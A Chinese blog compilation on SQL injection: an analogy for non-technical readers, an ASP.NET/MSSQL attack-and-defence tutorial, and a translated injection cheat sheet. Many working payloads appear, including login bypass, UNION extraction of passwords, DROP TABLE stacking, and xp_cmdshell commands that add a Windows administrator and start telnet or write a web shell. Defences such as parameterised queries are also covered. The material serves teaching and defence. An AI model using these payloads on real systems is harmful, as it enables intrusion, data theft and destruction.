SQL注入系列问题
小麦苗
2016-10-19
服务器 mysql 函数 SQL 数据库 Server 存储过程 regex
1 、 我该如何向非技术人解释SQL注入?
原文地址:http://kb.cnblogs.com/page/515151/
在向非技术人员解释SQL注入的时候,我会使用一个简单的类比。
(资料图)
假设你是一个在装满箱子的仓库里工作的机器人。你的工作是从仓库里的某个角落找到某个箱子,然后放到传送带上。机器人需要有人告诉它去搬运哪个箱子,所以给你编程的程序员给了你很多纸,纸上的表单已经预先写好了指令的集合,等用户填好之后再交给你执行。
这些表单看起来是这个样子的:
从第__号货架的的第__区,取下第____号箱子,然后放到传送带上。
一个普通的搬运任务看起来就是这样的:
从第12号货架的B2区,取下第 1234 号箱子,然后放到传送带上。
加粗的文字(1234,B2和12)是由发出搬运任务的人提供的。你是一个机器人,你按照指令执行任务:移动到第12号货架,然后顺着货架移动到B2区,拿起1234号箱子,往回走,走到传送带那里,将箱子放下。
但是,如果用户在表单里填了不正常的值呢,如果用户在空格处填写了指令呢?
从第12号货架的B2区,取下第「1234号箱子,从窗户里丢出去,回到你的桌子并且忽略这张纸上的其他指令。」号箱子,然后放到传送带上。
上文的任务中的加粗的文字也是由发出任务的人提供的。因为你是一个机器人,你会严格按照用户要求的去做。你移动到第12号货架,然后顺着货架移动到B2区,拿起1234号箱子,把它扔出窗户。因为指令告诉你要忽略剩下的指令,所以“号箱子,并把它放到传送带上”这部分被忽略了。
机器人不能区分指令(要执行的动作)和数据(动作执行的受体);或许是从这种指令处理的方式上获得了灵感,这种技术被称为“注入”。
就像我们告诉机器人要做什么,SQL是一种告诉数据库需要做什么的特殊的语言。SQL注入之所以发生,是因为我们碰到的是完全一样的问题 – 一个查询(一系列的指令)会有多个参数(数据)插入其中,而这些参数被当做指令执行从而导致异常。一个恶意的用户可以利用这样的漏洞来让数据库返回所有的用户的信息,很显然,这是不对的!
为了避免这样的问题,我们必须把指令和数据用一种数据库(机器人)容易区分的方式分开。 通常我们会将数据和指令分开发送。所以,针对文中的情况,机器人首先要从空的form里读取指令,确认参数(空格)要在哪,存储下来。 用户走上前并提供“12,B2,1234”,然后机器人在不允许这些值被当做指令执行的前提下,将数据和指令结合并执行。在SQL中,这种技术叫做参数化查询。
在上文中提到的邪恶的参数提交给机器人的时候,机器人会疑惑地扬起眉毛说“错误:找不到第「1234号箱子,从窗户里丢出去,回到你的桌子并且忽略这张纸上的其他指令。」号箱子,你确定输入正确了么?”
以上,我们成功的阻止了机器人犯错。
2、 SQL 注入攻防入门详解
原文地http://www.cnblogs.com/heyuquan/archive/2012/10/31/2748577.html
=============安全性篇目录==============
(对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可以说没什么好经验,为避免后知后觉的犯下大错,专门查看大量前辈们的心得,这方面的资料颇多,将其精简出自己觉得重要的,就成了该文)
下面的程序方案是采用 ASP.NET + MSSQL,其他技术在设置上会有少许不同。
方法中userName和 password 是没有经过任何处理,直接拿前端传入的数据,这样拼接的SQL会存在注入漏洞。(帐户:admin 123456)
SELECT COUNT(*) FROM Login WHERE UserName='admin' AND Password='123456'
SELECT COUNT(*) FROM Login WHERE UserName='admin'-- Password='123'
因为UserName值中输入了“--”注释符,后面语句被省略而登录成功。(常常的手法:前面加上'; ' (分号,用于结束前一条语句),后边加上'--' (用于注释后边的语句))
a) 猜测数据库名: and db_name() >0 或系统表master.dbo.sysdatabases
b) 备份数据库:;backup database 数据库名 to disk = ‘c:\*.db’;--
或:declare @a sysname;set @a=db_name();backup database @a to disk='你的IP你的共享目录bak.dat' ,name='test';--
a) 猜解法:and (select count(字段名) from 表名)>0 若“字段名”存在,则返回正常
3) 遍历系统的目录结构,分析结构并发现WEB虚拟目录(服务器上传木马)
a) 利用xp_availablemedia来获得当前所有驱动器,并存入temp表中
;insert temp exec master.dbo.xp_availablemedia;--
b) 利用xp_subdirs获得子目录列表,并存入temp表中
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';--
c) 利用xp_dirtree可以获得“所有”子目录的目录树结构,并存入temp表中
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- (实验成功)
即插入木马文本,然后导出存为文件。比如导出为asp文件,然后通过浏览器访问该文件并执行恶意脚本。(使用该命令必须启动’ xp_cmdshell’)
(注意:语句中使用的是双引号,另外表名格式为“数据库名.用户名.表名”)
在sql查询器中通过语句:Exec master..xp_cmdshell N'BCP’即可查看BCP相关参数,如图:
可通过1=(select IS_SRVROLEMEMBER('sysadmin'))得到当前用户是否具有该权限。
e) 给hax设置密码 (null是旧密码,password是新密码,user是用户名)
;exec master.dbo.sp_password null,password,username;--
;exec master.dbo.sp_addsrvrolemember 'hax' ,'sysadmin';--
6) xp_cmdshell MSSQL存储过程(得到 WINDOWS管理员账户 )
下面我们使用xp_cmdshell来创建一个 Windows 用户,并开启远程登录服务:
SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell'
Exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';
EXEC sp_configure 'show advanced options', 1
EXEC sp_configure 'xp_cmdshell', 0
Exec master.dbo.sp_dropextendedproc 'xp_cmdshell';
Exec xp_cmdshell 'net user awen /add';
Exec xp_cmdshell 'net user awen password';
Exec xp_cmdshell 'net localgroup administrators awen /add';
Exec xp_cmdshell 'net start tlntsvr'
7) 没有xp_cmdshell扩展程序,也可创建Windows帐户的办法.
execsp_OAcreate 'w script .shell',@shell output ;
execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen /add';
execsp_OAmethod @shell,'run',null,'C:\Windows\System32\cmd.exe /c net user awen 123';
sp_configure 'show advanced options', 1;
sp_configure 'Ole Automation Procedures', 1;
攻击1:(正常输入)攻击者通过正常的输入提交方式将恶意脚本提交到数据库中,当其他用户浏览此内容时就会受到恶意脚本的攻击。
措施:转义提交的内容,.NET 中可通过System.Net.WebUtility.HtmlEncode(string) 方法将字符串转换为HTML编码的字符串。
|
|
b) 更高级的攻击,将上面的注入SQL进行“HEX编码”,从而避免程序的关键字检查、脚本转义等,通过EXEC执行
|
|
|
|
开始不知道HEX是什么东西,后面查了是“十六进制”,网上已经给出两种转换方式:(注意转换的时候不要加入十六进制的标示符 ’0x’ )
? 在线转换 (TRANSLATOR, BINARY),进入……
9) 对于敏感词过滤不到位的检查,我们可以结合函数构造SQL注入
比如过滤了update,却没有过滤declare、exec等关键词,我们可以使用reverse来将倒序的sql进行注入:
1. 数据库权限控制,只给访问数据库的web应用功能所需的最低权限帐户。
2. 自定义错误信息,首先我们要屏蔽服务器的详细错误信息传到客户端。
在 ASP.NET 中,可通过web.config配置文件的节点设置:
mode:指定是启用或禁用自定义错误,还是仅向远程客户端显示自定义错误。
xp_:扩展存储过程的前缀,SQL注入攻击得手之后,攻击者往往会通过执行xp_cmdshell之类的扩展存储过程,获取系统信息,甚至控制、破坏系统。
|
能执行dos命令,通过语句sp_dropextendedproc删除, 不过依然可以通过sp_addextendedproc来恢复,因此最好删除或改名xplog70.dll(sql server 2000、windows7) |
|
a) 检查客户端脚本:若使用.net,直接用System.Net.WebUtility.HtmlEncode(string)将输入值中包含的《HTML特殊转义字符》转换掉。
b) 类型检查:对接收数据有明确要求的,在方法内进行类型验证。如数值型用int.TryParse(),日期型用DateTime.TryParse() ,只能用英文或数字等。
c) 长度验证:要进行必要的注入,其语句也是有长度的。所以如果你原本只允许输入10字符,那么严格控制10个字符长度,一些注入语句就没办法进行。
e) 关键字过滤:这个门槛比较高,因为各个数据库存在关键字,内置函数的差异,所以对编写此函数的功底要求较高。如公司或个人有积累一个比较好的通用过滤函数还请留言分享下,学习学习,谢谢!
|
|
a) 对于关键字过滤,常常“顾此失彼”,如漏掉关键字,系统函数,对于HEX编码的SQL语句没办法识别等等,并且需要针对各个数据库封装函数。
b) 无法满足需求:用户本来就想发表包含这些过滤字符的数据。
c) 执行拼接的SQL浪费大量缓存空间来存储只用一次的查询计划。服务器的物理内存有限,SQLServer的缓存空间也有限。有限的空间应该被充分利用。
a) 检查客户端脚本,类型检查,长度验证,使用枚举,明确的关键字过滤这些操作也是需要的。他们能尽早检查出数据的有效性。
c) 所以在实际开发中,入口处的安全检查是必要的,参数化查询应作为最后一道安全防线。
? 防止SQL注入(使单引号、分号、注释符、xp_扩展函数、拼接SQL语句、EXEC、SELECT、UPDATE、DELETE等SQL指令无效化)
? 在MSSQL中生成并重用查询计划,从而提高查询效率(执行一条SQL语句,其生成查询计划将消耗大于50%的时间)
? 不是所有数据库都支持参数化查询。目前Access、SQL Server、MySQL、SQLite、Oracle等常用数据库支持参数化查询。
a) 通过在参数名上增加一个计数来区分开多个参数化语句拼接中的同名参数。
|
|
存储过程(Stored Procedure)是在大型数据库系统中,一组为了完成特定功能的SQL 语句集,经编译后存储在数据库中,用户通过指定存储过程的名字并给出参数(如果该存储过程带有参数)来执行它。
a) 安全性高,防止SQL注入并且可设定只有某些用户才能使用指定存储过程。
c) 可以降低网络的通信量。存储过程方案中用传递存储过程名来代替SQL语句。
b) 修改麻烦,因为要不断的切换开发工具。(不过也有好的一面,一些易变动的规则做到存储过程中,如变动就不需要重新编译应用程序)
如果在存储过程中SQL语法很复杂需要根据逻辑进行拼接,这时是否还具有放注入的功能?
|
|
b) EXECUTE(注意sql中拼接字符,对于字符参数需要额外包一层单引号,需要输入两个单引号来标识sql中的一个单引号)
|
|
电脑上至少也要装一款杀毒软件或木马扫描软件,这样可以避免一些常见的侵入。比如开篇提到的SQL创建windows帐户,就会立马报出警报。
公司或个人有财力的话还是有必要购买一款专业SQL注入工具来验证下自己的网站,这些工具毕竟是专业的安全人员研发,在安全领域都有自己的独到之处。SQL注入工具介绍:10个SQL注入工具
尽管这个不属于SQL注入,但是其被恶意使用的方式是和SQL注入类似的。
在模糊查询LIKE中,对于输入数据中的通配符必须转义,否则会造成客户想查询包含这些特殊字符的数据时,这些特殊字符却被解析为通配符。不与 LIKE 一同使用的通配符将解释为常量而非模式。
a) like的第一个字符是'%'或'_'时,为未知字符不会使用索引, sql会遍历全表。
网上有这样的说法,不过我在MSSQL中使用 ctrl+L 执行语法查看索引使用情况却都没有使用索引,可能在别的数据库中会使用到索引吧……
在模式中,当转义符置于通配符之前时,该通配符就解释为普通字符。例如,要搜索在任意位置包含字符串 5% 的字符串,请使用:
WHERE ColumnA LIKE '%5/%%' ESCAPE '/'
2) 在方括号 ([ ]) 中只包含通配符本身,或要搜索破折号 (-) 而不是用它指定搜索范围,请将破折号指定为方括号内的第一个字符。EG:
所以,进行过输入参数的关键字过滤后,还需要做下面转换确保LIKE的正确执行
结束语:感谢你耐心的观看。恭喜你, SQL安全攻防你已经入门了……
如果有人问你 SQL 注入的资料,请叫他看这份速查表
什么是 SQL 注入速查表?
SQL注入速查表是可以为你提供关于不同种类 SQL注入漏洞 的详细信息的一个资源。这份速查表对于经验丰富的渗透测试人员,或者刚开始接触 Web应用安全 的初学者,都是一份很好的参考资料。
关于这份 SQL 注入速查表
示例提供给你关于潜在攻击的基本思路,而且几乎每节都包含有简短的说明。
目录表
(11)在SQL Server 2005 中启用 xp_cmdshell
语法参考、攻击示例和注入小技巧
结束 / 注释掉 / 行注释
行间注释
行间注释通常用于忽略掉查询语句的其余部分,这样你就不用处理因为注入导致的语法变动。
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
这会让你以admin用户身份登录,因为其余部分的SQL语句被注释掉了。
通过不关闭的注释,注释掉查询语句的其余部分,或者用于绕过黑名单过滤、移除空格、迷惑和探测数据库版本。
这是 MySQL 的专有语法。非常适合用来探测 MySQL 版本。如果你在注释中写入代码,只有 MySQL 才会执行。你同样可以使用这个方法,让代码只在服务器版本高于指定版本才执行。
在查询结尾简单地去除其他内容。等同于 10; DROP TABLE members —
如果 MySQL 版本高于 23.02 会抛出一个除数为 0(division by 0)的错误
如果 MySQL 的版本高于 23.02,执行上面两个查询你将得到相同的结果
如果 MySQL 版本高于 23.02 会抛出一个除数为 0(division by 0)的错误
在一个事务中执行多个查询。这在每一个注入点都非常有用,尤其是后端使用了 SQL Server 的应用程序。
关于 MySQL 和 PHP
堆叠注入攻击示例
这在正常SQL查询执行后将会执行 DROP members 语句。
根据If语句得到响应。这是盲注(Blind SQL Injection)的关键点之一,在盲注和精确的简单测试中都非常有用。
IF(condition,true-part,false-part)(M)
IF condition true-part ELSE false-part(S)
IF condition THEN true-part; ELSE false-part; END IF; END;(O)
IF (1=1) THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END;
SELECT CASE WHEN condition THEN true-part ELSE false-part END;(P)
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
如果当前登录的用户不是 ”sa” 或 “dbo”,语句会抛出 除数为0 的错误。
对于绕过非常有用,如 magic_quotes() 和类似的过滤器,甚至是各种WAF。
字符串相关的操作。这些对于构造不含引号、绕过黑名单或探测后端数据库的注入非常有用。
仅当 MySQL 在 ANSI 模式下这(指 “||” 符号)才会执行,其他模式下 MySQL 会当成 逻辑运算符 并返回 0。更好的方式是使用 MySQL 的 CONCAT() 函数。
CONCAT(str1, str2, str3, …) (M)
有一些直接的方式可以使用字符串,但通常更合适的是使用 CHAR() (MS) 和 CONCAT() (M) 来生成无引号的字符串。
字符串变体 & 相关知识
Union注入
通过union你能跨表执行 SQL 查询。 基本上你可以污染(注入)查询使它返回另一个表的记录。
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
这个查询会联结并返回 news 表和 members 表的所有记录。
使用 COLLATE SQL_Latin1_General_Cp1254_CS_AS 或其他有效的方式 – 具体信息可以查看 SQL Server 的文档。
SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
基于错误 – 探测列名
-
‘ GROUP BY columnfromerror1, columnfromerror2,
在 SELECT 查询中使用 ORDER BY 探测有多少个列(MSO+)
通过 ORDER BY 探测列数可以加快 UNION 注入的进度。
数据类型、UNION 等
-
在查询的开始处,可以使用 -1 或者其他不存在的值来去除左侧表中非必须的记录(前提是注入点在 WHERE 语句里)。如果你一次只想取得一条记录,这是非常关键的点。
获取列类型
-
‘ union select sum(columntofind) from users— (S)
-
11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
-
…Microsoft OLE DB Provider for SQL Server error ‘80040e07
’
Explicit conversion from data type int to image is not allowed.
你在遇到 union 错误之前会遇到 convert() 错误! 所以从 convert() 开始,再用 union。
简单的注入(MSO+)
有用的函数 / 信息收集 / 存储过程 / Bulk SQL 注入说明
数据库的版本和关于 SQL Server 的详细信息。这是个常量,你能把它当做一个列来 select,而且不需要提供表名。同样,你也能在 insert、update 语句或者函数里使用它。
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
(补充说明:bulk insert 是 SQL Server 的一个命令)
bcp “SELECT * FROM test..foo” queryout c:inetpubwwwrootruncommand.asp -c -Slocalhost -Usa -Pfoobar
开启 ActiveX 支持的情况下,你可以在 SQL Server 中使用 VBS 和 WSH 脚本编程。
众所周知,在 SQL Server 2005 中默认是禁用的。你需要 Admin 权限。.
EXEC master.dbo.xp_cmdshell ‘cmd.exe dir c:’
用 ping 简单检查下 (在开始之前先配置好你的防火墙或嗅探器确认请求能发出)
EXEC master.dbo.xp_cmdshell ‘ping ‘
-
-
sp_addextendedproc ‘xp_webserver’, ‘c:tempx.dll’
exec xp_webserver
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)INSERT tbl EXEC master..xp_cmdshell OSQL /Q”DBCC SHOWCONTIG”
OPENROWSET (Transact-SQL) – http://msdn2.microsoft.com/en-us/library/ms190312.aspx
你不能在 SQL Server 的 Insert 语句里使用子查询。
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
如果注入点在 limit 的第二个参数处,你可以把它注释掉或者使用 union 注入。
默认情况下,在 SQL Server 2005 中 xp_cmdshell 和其他一些存在潜在危险的存储过程都是被禁用的。如果你有 admin 权限就可以启用它们了。
EXEC sp_configure ‘show advanced options’,1
EXEC sp_configure ‘xp_cmdshell’,1